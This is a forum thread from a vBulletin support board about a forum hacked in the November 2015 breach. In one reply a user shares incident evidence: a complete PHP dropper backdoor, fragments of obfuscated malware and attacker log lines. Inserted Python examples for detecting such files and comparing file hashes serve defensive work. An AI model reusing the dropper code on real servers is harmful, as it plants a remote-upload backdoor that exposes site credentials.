Virus Detected on web host.

  • ravensix
    Member
    • May 2015
    • 40
    • 5.1.x

    Virus Detected on web host.

    My web host has detected a virus on the server. The file that they say is a virus "core/vbpatch_v10835.php". Does anyone know if this is a legit file?
  • In Omnibus
    Senior Member
    • Apr 2010
    • 2310

    #2
    Assuming you're operating on vBulletin 5.1.9 Patch Level 1, I have no such file in my vBulletin installation.

    Comment

    • ravensix
      Member
      • May 2015
      • 40
      • 5.1.x

      #3
    I have not upgraded to it yet.

      Comment

      • In Omnibus
        Senior Member
        • Apr 2010
        • 2310

        #4
        Do you have any modifications or add-ons installed? Perhaps the file came from one of them?

        Comment

        • IggyP
          Senior Member
          • Mar 2012
          • 680

          #5
          I don't see it... sounds suspect

          Comment

          • ravensix
            Member
            • May 2015
            • 40
            • 5.1.x

            #6
            That's what I'm thinking as well. The only add-on I have is Tapatalk at the moment. I have given access to the vBulletin team to sort some things out. I am wondering if they did something. Waiting to hear from them.

            Comment

            • jon mutiger
              New Member
              • Jul 2008
              • 23
              • 3.7.x

              #7
              Originally posted by ravensix
              My web host has detected a virus on the server. The file that they say is a virus "core/vbpatch_v10835.php". Does anyone know if this is a legit file?
              This is definitely a hacked file; your vBulletin has almost certainly been compromised as a result of last week's security issue and not patching fast enough. You need to restore everything (files and database) to a safe backup from before the latest vBulletin security hack.

              Because vBulletin.com itself was hacked and its database compromised (see online news links at the end of this article or VB's password reset announcement), there was a complete list of all vBulletin website URLs that the hackers would have been able to access. This caused a lot of sites to be owned very fast. I installed the patch just 24 hours after the security announcement and our forum (a small motorcycle club, hardly a high profile target) was already hacked. If you didn't install the patch within 24 hours, your vBulletin is probably owned too.

              These hackers were sophisticated - using a large Russian botnet with hundreds of IP addresses they proceeded to drop malware files all over the codebase, including fake .php files in vBulletin as well as in Wordpress and other PHP applications on the server. In my case it all started with this file, which they dropped on the server Nov 6th 6:39PM pacific time, about 24 hours from the security bulletin's release and just hours before I installed the patch.

              402 Nov 6 18:39 jsrender.php - in forum/core
              /public_html_hacked/forum/core# more jsrender.php
              <?php
              if ((!isset($_REQUEST['pwd'])) || (empty($_REQUEST['pwd'])) || (md5($_REQUEST['pwd'])!='1a52094472487da553df7b35be694127')) die('NULL');
              if (isset($_FILES['js']))
              if (move_uploaded_file($_FILES['js']['tmp_name'],$_FILES['js']['name']))
              echo $_FILES['js']['name'];

              if (isset($_REQUEST['config']))
              {
              include('includes/config.php');
              echo "\n\n<config>".json_encode($config)."</config>\n\n";
              }
              ?>

              This is a simple file dropper script that was then used to install and hide more malware and eventually start a spam campaign. Here they are using it (they only needed to once):

              188.163.80.234 - - [08/Nov/2015:11:12:49 -0800] "POST /forum/core/jsrender.php HTTP/1.0" 200 281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"

              From there they created the following malware files (your malware files may vary though in your installation.. it doesn't matter as the whole codebase is throwaway, there's no way to accurately find all the malware and clean it, these guys know what they are doing). You will note they sneakily changed the dates on the .PHP files to Oct 24th, so it's impossible to just check by date to see which ones have changed. (Oct 24th is the date of when I last updated the vBulletin codebase, so the files hide amongst the other ones in the folder and don't show up as changed).

              4768 Nov 8 11:12 vbpatch_v74862.php - in /forum/core
              This is not a legit VB script, and looking at it confirms it's all obfuscated malware:
              public_html_hacked/forum/core# cat vbpatch_v74862.php
              <?php ${"\x47\x4c\x4f\x42A\x4c\x53"}["\x6b\x64\x71\x79\x65e"]="\x76\x61lue";${"\x47\x4c\x4f\x42\x41L\x53"}["\x77\x62\x71q\x62\x67\x6f"]="\x6b\x65\x79";${"\x47LOB\x41\x4c\x53"}["t\x66\x62\x71\x75\x76\x75"]="\x64\x61\x74a";${"\x47\x4c\x4f\x42\x41\x4cS"}["\x62ba\x6e\x68\x71\x76\x6e\x64k"]="i";${"\x47\x4c\x4fB\x41\x4c\x53"}["e\x77\x76\x74uj\x71f\x73c\x70"]="\x64at\x61";${"\x47LO\x42\x41L\x53"}["\x6fhnb\x68dky\x76"]="\x6f\x75t_d\x61\x74\x61";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6c\x73rir\x78u"]="d\x61\x74\x61\x5fke\x79";${"\x47L\x4f\x42\x41L\x53"}["x\x65\x77\x68\x72\x72\x68"]="\x64\x61\x74\x61"; [ ... etc ... ]

              10938 Oct 24 15:15 error.php - stashed in our wordpress install at /wp-content/themes/Divi/css/error.php, this was used to send out porn spam

              Oct 24 10:35 export.php - in /forum/core/vb/external/
              223.252.30.129 - - [11/Nov/2015:17:27:52 -0800] "POST /forum/core/vb/external/export.php HTTP/1.0" 200 176 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"

              This one was the main spam gateway they used. It's sneaky in that they added code to the top of a real vBulletin file (there is an export.php at that location). The malware code is strange looking and easy to spot:

              public_html_hacked/forum/core/vb/external# more export.php
              <?php
              $GLOBALS['gc45'];global$gc45;$gc45=$GLOBALS;$gc45['yc1b']="\x62\x72\x5e\x47\x6c\x5d\x6a\x30\
              x46\x68\x57\x3f\x54\x64\x63\x5f\x33\x41\x5a\x22\x61\x78\x40\x23\x79\x2b\x49\x20\x2f\x3a\x6 b\x53\x9\x74\x3b\x38\x4b\x4a\x25
              \x6d\x75\x4f\x59\x60\xa\x69\x3d\x45\x36\xd\x2a\x5b\x70\x37\x43\x77\x55\x56\x5c\x39\x7e\x2e \x7d\x2c\x73\x27\x7a\x32\x3c\x34
              \x35\x24\x4c\x71\x6f\x44\x21\x48\x58\x31\x7c\x50\x51\x2d\x66\x65\x52\x26\x29\x67\x7b\x6e\x 76\x28\x4d\x3e\x42\x4e";$gc45[$g
              c45['yc1b'][20].$gc45['yc1b'][70].$gc45['yc1b'][53].$gc45['yc1b'][16].$gc45['yc1b'][59].$gc45['yc1b'][14].$gc45['yc1b'][20
              ].$gc45['yc1b'][70].$gc45['yc1b'][53]]=$gc45['yc1b'][14].$gc45['yc1b'][9].$gc45['yc1b'][1];$gc45[$gc45['yc1b'][14].$gc45['
              yc1b'][69].$gc45['yc1b'][69].$gc45['yc1b'][53]]=$gc45['yc1b'][74].$gc45['yc1b'][1].$gc45['yc1b'][13];$gc45[$gc45['yc1b'][2
              0].$gc45['yc1b'][67].$gc45['yc1b'][79].$gc45['yc1b'][69].$gc45['yc1b'][48].$gc45['yc1b'][13]]=$gc45['yc1b'][64].$gc45['yc1
              b'][33].$gc45['yc1b'][1].$gc45['yc1b'][4].$gc45['yc1b'][85].$gc45['yc1b'][91];$gc45[$gc45['yc1b'][66].$gc45['yc1b'][14].$g
              c45['yc1b'][13].$gc45['yc1b'][79].$gc45['yc1b'][53].$gc45['yc1b'][85]]=$gc45['yc1b'][45].$gc45['yc1b'][91].$gc45['yc1b'][4
              [.. further down the file the regular vBulletin PHP source can be found.]


              In the end, I had to perform a full rebuild: I moved all the web files out of the way and rebuilt a cleanly downloaded PHP codebase for vBulletin (don't forget to patch it!!!) and also for my WordPress install. There IS no way you can reliably tell which files have changed as I mentioned above, these hackers exploiting this in bulk are sophisticated professional criminals and they use very cunning methods to hide their tracks. The only realistic method for recovery is to start fresh with either a backup from before this all happened (ie. pre Nov 8th) or by re-downloading all the vbulletin files again. Do not, under any circumstances, just assume you spotted all the malware and removed it, that will not be enough to keep them out.

              In my case, the spammers tried to send out 80,000 graphic porn spams before I noticed and was able to shut them down. It was one of the more difficult cleanups I've performed, and I do this stuff for a living.

              While I appreciate the rationale behind vBulletin's policy of keeping the info in the locked customer thread, I think it's important they recognize the unusual circumstances here, namely that the initial compromise of the vB site has provided Russian spammers with a laundry list of sites to attack, which they then did attack within the first 24 hours. More information on detecting hacked activity, specific information on the attack vectors used this last weekend would be helpful information. Requiring customers to be paid up with the latest version to get this information is at best not providing any more security, and at worst gives the (mistaken) impression that VB is taking advantage of this situation as a cash grab, extorting compromised customers into purchasing the latest license in order to upgrade or get information. Insult to injury: there is really no current information to be had on the members only thread, other than mentioning the need to update and referencing 2 year old instructions on how to recover from hacks.

              I urge VB to appreciate the scope of this problem and the unique situation here, and then make more information publicly available, since a great number of people are likely in this situation now. The cat is, after all, already out of the bag as a google news search for "vbulletin hack" shows. https://news.google.com/news/story?n...ved=0CCEQqgIwA
              Last edited by jon mutiger; Thu 12 Nov '15, 10:08am.

              Comment
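              The post above shows two things a defender can look for on a host: dropper-style PHP (a password gate on md5() plus move_uploaded_file() on $_FILES), heavily \xNN-escaped ${"..."} obfuscation, and planted files whose mtime was set back to blend in. This added example (not from the thread or from vBulletin) scans PHP files for those indicators and flags an old mtime paired with a fresh ctime, since utime/touch can rewrite mtime but not ctime; the sample files, regexes and the placeholder hash are constructed.

```python
import os
import re
import tempfile
import time

# Indicators modelled on the files quoted in the thread (constructed regexes).
INDICATORS = {
    "upload_dropper": re.compile(r"move_uploaded_file\s*\(\s*\$_FILES"),
    "md5_password_gate": re.compile(r"md5\s*\(\s*\$_(REQUEST|POST|GET)\b"),
    "hex_obfuscated_globals": re.compile(r'\$\{\s*"\\x[0-9a-fA-F]{2}[^"]*"\s*\}'),
}

def hex_escape_ratio(source: str) -> float:
    """Fraction of the text made of \\xNN escapes; real vBulletin code is near 0."""
    return 4 * len(re.findall(r"\\x[0-9a-fA-F]{2}", source)) / max(len(source), 1)

def scan_php(path: str, max_gap_seconds: float = 86400.0) -> list[str]:
    """Return the reasons a PHP file looks suspicious (empty list = nothing found)."""
    with open(path, "r", errors="replace") as fh:
        src = fh.read()
    reasons = [name for name, rx in INDICATORS.items() if rx.search(src)]
    if hex_escape_ratio(src) > 0.2:
        reasons.append("hex_escape_density")
    st = os.stat(path)
    # touch/utime can set mtime to any date, but the kernel updates ctime on
    # every inode change, so "old mtime, fresh ctime" is a timestomping lead.
    # chmod/chown also bump ctime, so treat this as a lead, not proof.
    if st.st_ctime - st.st_mtime > max_gap_seconds:
        reasons.append("mtime_older_than_ctime")
    return reasons

def demo() -> dict[str, list[str]]:
    """Scan three constructed files: a clean one, a dropper, an obfuscated one."""
    samples = {
        "index.php": '<?php\necho "hello";\n',
        "jsrender.php": ("<?php\nif (md5($_REQUEST['pwd']) != '<PLACEHOLDER_MD5>') die('NULL');\n"
                         "if (move_uploaded_file($_FILES['js']['tmp_name'], $_FILES['js']['name']))\n"
                         "  echo $_FILES['js']['name'];\n"),
        "vbpatch_v00000.php": r'<?php ${"\x47\x4c\x4f\x42A\x4c\x53"}["\x6b\x64"]="\x76\x61lue";',
    }
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in samples.items():
            path = os.path.join(tmp, name)
            with open(path, "w") as fh:
                fh.write(body)
            if name != "index.php":  # back-date the planted files, as the attackers did
                old = time.time() - 30 * 86400
                os.utime(path, (old, old))
            results[name] = scan_php(path)
    return results
```

Run it as `find /path/to/forum -name '*.php'` piped into scan_php() on a copy of the tree; anything it flags still needs a read-through, and a clean result does not prove the tree is clean.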

              • ravensix
                Member
                • May 2015
                • 40
                • 5.1.x

                #8
                Thank you very much for the info, @jon mutiger. This happened on Nov 8th, that is 4 days ago. If I do a backup till then, then I lose 4 days worth of posts. My host stopped the file from doing anything as soon as it was uploaded. Do you think it's safe to say that I am good or should I really do a clean install of the vb software and use the backup file of the database?

                Comment

                • In Omnibus
                  Senior Member
                  • Apr 2010
                  • 2310

                  #9
                  Jon doesn't know that your problem and his problem are the same problem. He's just guessing. He may be correct but what you need to do first is to check your database for suspect files.

                  AdminCP / Maintenance / Diagnostics / Suspect File Versions

                  Comment

                  • ravensix
                    Member
                    • May 2015
                    • 40
                    • 5.1.x

                    #10
                    How do I know which files are good?

                    Comment

                    • In Omnibus
                      Senior Member
                      • Apr 2010
                      • 2310

                      #11
                      Originally posted by ravensix
                      How do I know which files are good?
                      You'll get an error message for each file that reads "File does not contain suspected contents" or "File is not recognized as part of vBulletin"

                      Comment
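                      The AdminCP "Suspect File Versions" check above compares installed files against the versions vBulletin expects. The same comparison can be done from the shell against a freshly downloaded copy of the same version, which matters when the AdminCP itself runs on the compromised host. This added example (not vBulletin's diagnostic) hashes both trees and reports files that differ, are missing, or exist only in the live tree, which is where planted files such as jsrender.php show up; the sample trees and their contents are constructed.

```python
import hashlib
import os
import tempfile

def hash_tree(root: str) -> dict[str, str]:
    """Map each relative path under root to its SHA-256 hex digest."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                digests[rel] = hashlib.sha256(fh.read()).hexdigest()
    return digests

def compare_trees(clean_root: str, live_root: str) -> dict[str, list[str]]:
    """Classify the live tree against the clean reference download."""
    clean, live = hash_tree(clean_root), hash_tree(live_root)
    return {
        "modified": sorted(p for p in live if p in clean and live[p] != clean[p]),
        "extra": sorted(p for p in live if p not in clean),  # planted files land here
        "missing": sorted(p for p in clean if p not in live),
    }

def demo() -> dict[str, list[str]]:
    """Constructed trees: a reference copy, and a live copy with one altered and one planted file."""
    reference = {
        "core/index.php": "<?php // clean file\n",
        "core/vb/external/export.php": "<?php // clean export\n",
    }
    live = dict(reference)
    # Mirror what the thread describes: junk prepended to a real file, plus a new dropper.
    live["core/vb/external/export.php"] = "<?php /* prepended */ " + reference["core/vb/external/export.php"]
    live["core/jsrender.php"] = "<?php // planted dropper placeholder\n"
    with tempfile.TemporaryDirectory() as tmp:
        for side, files in (("clean", reference), ("live", live)):
            for rel, body in files.items():
                path = os.path.join(tmp, side, rel)
                os.makedirs(os.path.dirname(path), exist_ok=True)
                with open(path, "w") as fh:
                    fh.write(body)
        return compare_trees(os.path.join(tmp, "clean"), os.path.join(tmp, "live"))
```

Exclude paths that legitimately differ between installs (the config file, attachment and cache directories) before reading the "extra" and "modified" lists.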

                      • Leong
                        Member
                        • Oct 2014
                        • 57
                        • 5.1.x

                        #12
                        Hi, I think my website was hacked too. I am using version 5.1.3... what do you suggest? Upgrade to 5.1.9 and do all the latest patches?

                        Comment

                        • IggyP
                          Senior Member
                          • Mar 2012
                          • 680

                          #13
                          Would be nice if there was a clean up tool for old files in the upgrade process...

                          I had to clean up a bunch of old scripts from older versions of vb5 that were flagged as suspect.

                          Guess it's a good time to do that tho...

                          Comment

                          • In Omnibus
                            Senior Member
                            • Apr 2010
                            • 2310

                            #14
                            Originally posted by Leong
                            Hi, I think my website was hacked too. I am using version 5.1.3... what do your suggest? upgrade to 5.1.9 and do all the latest patch?
                            Yes. http://www.vbulletin.com/forum/forum...-through-5-1-9

                            Comment

                            • Leong
                              Member
                              • Oct 2014
                              • 57
                              • 5.1.x

                              #15
                              Agree iggy, thanks

                              Comment
